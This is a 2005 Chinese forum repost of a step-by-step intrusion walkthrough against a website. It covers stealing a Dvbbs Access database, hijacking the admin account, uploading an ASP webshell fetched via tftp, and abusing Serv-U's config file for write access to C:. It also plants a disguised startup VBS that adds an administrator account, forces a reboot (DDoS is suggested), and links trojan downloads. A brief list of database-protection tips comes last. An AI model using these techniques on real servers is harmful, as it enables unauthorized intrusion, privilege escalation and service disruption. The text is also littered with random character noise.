QQ登录

只需要一步,快速开始

 注册地址  找回密码
查看: 3294|回复: 1
打印 上一主题 下一主题

通过asp木马配合serv-u取得管理员权限

[复制链接]
字体大小: 正常 放大
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

跳转到指定楼层
1#
发表于 2005-1-23 13:28 |只看该作者 |倒序浏览
|招呼Ta 关注Ta

编者:文章题目很简单.内容却比题目有趣多了,建议各位看看

+ Q, F, g( T4 [0 i8 e+ b/ ~2 B. O

作者:ALLEN QQ:515659

5 g4 M. G8 k5 n( H

今天心情不好,写一篇文章玩玩吧,利用网站的配置错误配合serv-u取得管理员权限,简单一点就是通过asp木马配合serv-u取得管理员权限,哈哈哈,是不是很cool阿! 8 p$ ~4 a; y; ?0 \7 _------------文章开始------------ 5 l7 A. k, K, ]8 _, E为了找仓木麻衣的mp3(这个小姑娘的歌很好听阿),把半个互联网都搜完了(太夸张了把),就是找不到,苦然眼镜一亮,哈哈哈×××论坛,看来人气不错,也有mp3的下载地址,那就去看看吧 0 ]* i" e0 Q% e. h9 C 晕~~~~, 2 }) P3 R6 K" I# x1 a, P ^ 论坛错误信息 6 W- Y0 ]2 l( L# N8 u: @/ N 产生错误的可能原因: . G7 X7 u" e9 k( d: ?- `/ Q 您是否仔细阅读了帮助文件,可能您还没有登陆或者不具有使用当前功能的权限。 . r2 R3 N# W7 ^; } 还要注册阿,可是论坛由于种种原因又不让注册 , X( S1 r" {/ c9 U4 [& ? 气的我差点吐血! 7 N5 S7 L# J" H怎么办阿???唉,本想用溯雪破解几个密码。可是我们这个落后的地方上网贵,速度慢,有那个钱早就可以去买几张d版cd了,算了吧,想想别的办法把,打开我的xscan,随便扫了一下,服务器挺安全阿,只开了21,80,3389端口 + Z0 b* b% N1 y 看来做了端口过滤 ! |8 l' d4 F2 T: m1 C* i 没什么可利用的漏洞怎么办,不要着急,他用的是动网论坛,先试着下载他的数据库试试吧 1 N8 a4 G3 q1 l# l* I! I 手动的找了一些,都不行 3 O" f6 X8 C/ h, j 我先猜一下数据库在哪个目录里面,如果猜对的话下载数据库的成功率就比较高了 8 C/ S' |& j9 i, j _blank>http://aaa.com/data L. f: i7 D3 g6 \ _blank>http://aaa.com/database 2 f4 N$ l0 E) @' U% J! g$ ~ _blank>http://aaa.com/db * w- g% |" v9 q7 \ HTTP 错误 404 - 找不到文件 ! r, [, m, ^4 s$ } R0 |% Q* j/ @ Internet 信息服务 1 q% J2 B8 z9 G6 N) J继续 4 Q) O, a" T+ b& j: z _blank>http://aaa.com/mdb 2 z) O- K# [) l6 i9 V3 q HTTP 错误 403 - 禁止访问 ; V" S ~' C" F3 X6 I8 [7 { Internet Explorer 6 T9 y, Q& n- Y8 y3 I4 \ 出现403错误就说明对方有这个目录,但是不允许浏览目录 * f& \$ X3 a* e4 h8 L0 I 想想看mdb这个目录会是干什么的??哈哈十有八九十存放数据库的目录! 0 N7 Y, \. s' H& }9 B: ~8 e 把我以前些的添加的数据库地址文件载入xscan(专门下载数据库的地址),然后只扫描cgi漏洞 " i! A. U; |! Rscaning.......,大概10分钟过去了 9 M8 H* _/ p6 [# J; p" h 扫描结果 ) ?! s. C% h# D9 j /mdb/lovemaik.asa [漏洞描述] + L! S. B* v5 K* S' U& c哈哈哈,成功的扫到了数据库,顺便告诉大家一个技巧6 F$ `5 S( q2 u6 d+ h 把一些常用的数据库地址如data.mdb,database.asp等等添加到xscan的cgi数据库中,或者单独作一个数据库,你可以用一些字典来生成数据库地址,这样的成功率很高的! 0 l7 K9 u0 t+ @- x0 w6 E: Y; f0 _xscan有一个好处就是可以直接扫域名,比如_blank>http://www.seeie.com 0 _' s5 Q/ f. W s0 |3 `这样的话xscan就会帮你猜数据库地址 ( o/ d' m& b) \! g9 W% R# j _blank>http://www.seeie.com/mdb/data.asp + G- N1 o! ^( _1 z) M, }* U_blank>http://www.seeie.com/mdb/db.mdb ; j6 g3 b8 U/ a1 F9 Y....... 8 i0 [4 N5 G) X6 S8 C. C5 H 好了,现在打开Net Transport(一种很爽的下载工具)把数据库down过来,用了50多分钟,终于下载完了 0 T5 Y: g2 R. G) C6 t: S! w" v- o! N 在自己的机器上安装jmail和动网论坛,把下载的数据库覆盖新数据库并且把数据库扩展名改为.mdb,接着注册用户:allen,密码:123456 4 S7 h( i' K4 Z+ z, {) J 现在打开数据库,查看到我们刚才注册的用户allen的密码为49ba59abbe56e057(由于论坛使用md5不可逆算法加密,所以不能得到明文密码' g" Q6 x4 `/ T& X6 V* x, p# B% M好的把这一串数据复制一下,然后找到管理员的名字,也就是查找userclass表中数据为管理员的名字,把他的密码改成49ba59abbe56e057,记住在改密码之前一定要把他的密码(经过MD5加密过的)复制到一个记事本里,好了,我们用管理员的名字登陆,密码就是123456,接着我们就去修改管理员的资料,把回答问题和答案改掉!把email换成自己的,接着把刚才注册的用户allen提升为管理员,退出,在用allen帐号登陆,把原来的管理员降成普通用户,可能有些人会问这样做是为什么,原因是动网论坛不允许通过email取回管理员的密码,接着在打开数据库把原来管理员的密码给恢复了,在打开论坛,忘记密码-回答问题-取回密码,哈哈哈,快打开你的信箱把,密码已经发到你信箱了(注意,你的系统最好装jmail等邮件发送组件,要不然就会发不了邮件的) : l+ P4 c% \( N2 } 现在我们拿到了论坛管理员的密码了, 5 r! t+ s6 j- w注意:以上步骤都是在本地操作的,其目的就是为了拿到论坛管理员密码* q6 U" b9 y& P现在登陆那个论坛-进入管理页面-论坛版面管理 -随便选一个讨论区-在上传文件类型中加上.asp,呵呵 + A, a5 j' C6 t# c3 t好了,进去这个讨论区发表帖子-上传文件,呵呵,把asp木马传上去 / f# L* D' ?* L" ~# d$ j 好了,可是这个文件被重命名了,唉,新亏手里还有一个免fso的木马,只有一个文件。传上去 9 g$ ^! D6 O8 Q( p2 w, C O9 h$ E$ l2 e 可惜这个木马不好用,还是自己的木马用着顺手,于是tftp -i ***.***.***.*** GET use.asp ) p5 G" M+ s* c) ~5 X5 S5 i4 F 好了,成功了,接这运行木马***.com/bbs/use.asp?id=1 / z$ {' w& D' z& Q呵呵,服务器的东西清清楚楚的摆在我们面前了,上传一个winshell把 ( B9 A& v4 C8 D3 l# [ P靠,服务器有病毒防火墙,看看是nav的,算了,自己加个壳吧,这样可以逃过防火墙# h) }& D, l- P0 M9 ?7 a" y 继续,传上去并执行。。。。没反应! ( ]" ]5 O% b5 J' w% |$ G1 G/ J先telnet ip 8210(我喜欢用noika手机的型号做为端口,)

zan
转播转播0 分享淘帖0 分享分享0 收藏收藏0 支持支持0 反对反对0 微信微信
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

靠,不行,差点忘了,对方做端口过滤了,怎么办阿,试试idq.dll(没报什么希望),果然对方的目录不可执行,在看一下对方有没有装perl,还是没有!在看看对方是什么分区格式,要是fat32那就好办了,试着删除c:\的任何文件都提示没有权限!说明对方是ntfs分区,唉,麻烦阿!!! ( [: n! m& O/ C本来想就此打住的时候突然发现了d:\Serv-U,于是我就想通过他来拿到权限 $ l; I: H- k4 K 注:在此之前最好在自己的机器上装一个Serv-U, ' G# @& F/ i: q. b2 _5 ^我们先看看ServUStartUpLog.txt 这里面有Serv-U的版本信息! : }+ k2 b& }* {' kSat 01Mar01 12:15:24 - Serv-U FTP Server v4.0 (4.1.0.0) - Copyright © 1995-2002 Cat : {" ?( f2 j; r i。。。。。。。。。。 8 ~" v/ d$ X; k/ j. e 版本挺新阿,呵呵 1 s- B- O! W3 k4 ?接着看看ServUDaemon.ini(用户配置文件) 4 i7 _4 R$ Z( ]7 K 哇考,里面的用户真多阿! & x! a; ?# h+ X+ a6 v# n8 m2 B1 o- t 接着我们把这个文件的内容复制一下,然后粘贴到本地serv-u的ServUDaemon.ini文件中,记住这时候最好停掉你的serv-u,保存文件,接着打开ServUAdmin.exe,重新添加一个用户,记住这个用户最好是管理员权限,必须对目录和文件可以进行读写可执行等一切操作,接着把用户主目录设为c:\ # D/ q: @6 S0 V* o哈哈哈,到次为止大家都知道我的用意了把! ; u1 X3 ~& }" J8 ?+ ^! Z. ~. w 把本地的ServUDaemon.ini的内容copy到对方服务器的ServUDaemon.ini中,然后保存! 4 C7 n0 W4 W" c, j: W% c. U5 z接这ftp上去 ; K0 U! K. U2 \ z2 z哈哈c盘的东西全部暴露了,现在我们对c盘有读写权限,可以进行任何操作(注意:serv-u的管理员权限和nt的管理员权限不是一样的,serv-u的管理员只能配置serv-u) 3 p7 q2 K' t4 V+ Y6 q, S 由于对方做了端口过滤,办法不是很多,可以参考一篇修改注册表根改端口过滤的文章,是灰色轨迹论坛的一个网友写的,哈哈,在这里就不多说了! $ }! U5 a1 h- R/ x& z) o: W [3 ? 我们先写一个vbs脚本,把这个脚本重命名为Adobe Gamma Loader.vbs,这样管理员不容易发现! 9 T7 ~/ a% W: u, Q/ J8 w. k$ @ 脚本内容: 3 _. L$ f6 C% j" ?* l$ Bset wshshell=createobject ("wscript.shell" ) 1 y" F& D' G' na=wshshell.run ("cmd.exe /c net user allen ***** /add",0) - Z& w0 W2 k9 y% Z$ cb=wshshell.run ("cmd.exe /c net localgroup Administrators allen /add",0) ; i, h/ C0 k# D9 z s 大家都能看懂把,就是添加一个用户为allen密码为***的具有管理员权限的帐号,哈哈! 4 A L1 l' m( J* a% ^6 \1 B* g把这个脚本上传传到c:\Documents and Settings\All Users\「开始」菜单\程序\启动\ ! h/ u; w0 r+ ` Y( I3 V% A 呵呵为什么要vbs脚本呢?原因很简单,就是不让管理员看见那个跳出来的黑黑的dos窗口。 Q3 E( F( R# N% d7 O1 j3 Q现在我们想办法让对方机器重启动! # W5 \7 m/ Z6 B7 ~" E5 {7 ^用asp木马上传一个shutdown.exe ! g. [( Z# [3 D) q# G. \+ ]然后执行shutdown.exe 127.0.0.1 /r ! \" ]/ X, K& z& I; V. K! ? 哈哈,有时候可能不会成功,是权限的原因,具体。。。我也不太清楚。 ; }0 Y' \$ F9 [2 T3 Z/ G: I 不过在nt or 2000上普通用户都可以重起机器 6 ]8 ]( E0 Z& h9 k( {3 ^ 还有一个办法就是在你的机器上新建一个计划任务,内容就是定时重启动计算机,然后把他放到对方计划任务的目录下,如果对方没有开计划任务就不行了! * |0 V9 s! j, `* \4 h/ Z+ ~0 p 如果还是成功不了你就用ddos把,哈哈,很暴力的让对方拒绝服务,接这就会重启(有可能是管理员操作的) # z: Y( ^' d/ [: C* J8 \ d" D5 ^' L0 v% ]3 o/ s& e8 Q% K& m重启之后只要管理员登陆就可以添加一个帐号,哈哈 0 V$ N, @- B: n/ {9 f1 I# i 到此为止我已经拥有了管理员权限,呵呵 ; z5 b( }% y7 o0 r# B " x* {% B: P% C$ F4 K(关于端口过滤) + o& _ }$ _3 I7 P, J, C2 ` 一般服务器至少会开21,80端口,像这种情况,即使有了管理员权限也没有多大用处! 5 S# R/ _6 v3 h3 a3 G4 h如果你可以得到一些bbs或者其他程序的管理员密码就比较好办了 . X7 Q) J8 j: g! [# K" n 先传asp木马,然后用sc停掉ftp服务,接着弄一些后门来占用21端口 ( v& Z& Z4 I& Q% g. k或者干脆暴力的占用!不过这些办法在ntfs的分区上成功率并不高!经过实践我发现一般可以暴力占用80端口,前提是对方web服务器为iis!这样在你没有完全拿到管理员权限之前,对方的网站可能会一直瘫痪,哈哈! 9 G# R0 i9 a: g- M. k . O) ]; R) R5 s: g2 u% C \(关于access数据库的安全性) ) N6 o3 r9 e( [% k: b0 [0 l# P 现在大部分网站都使用asp+access构建,这样的话通过下载access数据库简单就可以对网站进行破坏! # b8 f" c, ?/ o8 t# x# y, ] 而很多的网站都不太重视这些,比如数据库文件名是data.mdb等 2 [6 l6 E* E, N8 u# b/ ~而又有一部分人认为把数据库的扩展名改成.asp就万事大吉了, X7 @- i+ ~) O: ~4 u9 v 其实不然!大家可以做个试验 ,在自己的机器上把mdb改成asa或者asp 然后用任何一种下载工具下载,下载之后再把文件名改成.mdb ( c8 C, i4 Y+ r文件照样可以用!道理很简单!iis只执行<% %>内的内容,而mdb文件单纯的修改扩展名只会让iis错误的以txt方式显示出来 $ W1 E2 X- W& ~1 h# K你可以看见,如果在浏览器执行***.asp(注意:这个是mdb数据库)就会看见一大堆乱码,和你用记事本打开看见的一样! " ]1 T- n ]6 t- d8 S: |' {- p防止数据库被下载的方法就有4种 8 k+ |: w4 B2 ?7 j1:在数据库新建一个表,表名为<%safe就可以了 ,这样iis在解析的时候会出现500错误,数据库也就下载不了了! 2 [( V2 e$ M" M7 d; Z2:在你的数据库文件名后门加上# (不是扩展名,比如name#.mdb)这样iis就以为你是在请求该目录中默认的文件名,比如index.asp,如果iis找不到就会发出403禁止浏览目录的错误警告! 2 w/ G. X# c% R6 R% ]- e9 r 3:在iis中是把数据库所在的目录设为不可读,这样就可以防止被下载!请放心,这样做不会影响asp程序的正常使用!! , w8 [; U* ~) H: { h7 v1 d; ? 4:直接使用数据源 (ODBC)这样数据库就可以不用在web目录里面,从而彻底防止被下载,但是这样做你必须拥有服务器的管理员权限,哈哈,大部分虚拟主机用户是不可能用数据源 (ODBC)的! ) T$ |8 @( U" E5 I-------------------------------------------------------------------------------- " w4 e& J3 @8 R0 e1 R. y( J. \ 本文涉及到的asp木马可以在以下地址下载: 4 }- b! F4 }6 @# h& N/ V _blank>http://www.seeie.com/download/door/aspmm.rar (本人写的,需要在木马后面加上?id=1的参数,比如_blank>http://aaa/com/use.asp?id=1) 0 i/ X$ e3 ]! p$ t& N_blank>http://www.seeie.com/download/door/nofso.rar (免fso的asp木马,很不错) ( _. y1 t. W. T9 ? 2 f- f, O# T3 M4 I$ u7 DHomepage:seeie.com 1 F5 p/ ~; I0 ]- G7 n Email:raul666@163.com / C$ l1 N; ~: o# V, W* @-----------------文章结束------------------------------
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册地址

qq
收缩
  • 电话咨询

  • 04714969085
fastpost

关于我们| 联系我们| 诚征英才| 对外合作| 产品服务| QQ

手机版|Archiver| |繁體中文 手机客户端  

蒙公网安备 15010502000194号

Powered by Discuz! X2.5   © 2001-2013 数学建模网-数学中国 ( 蒙ICP备14002410号-3 蒙BBS备-0002号 )     论坛法律顾问:王兆丰

GMT+8, 2026-4-20 11:18 , Processed in 0.654238 second(s), 56 queries .

回顶部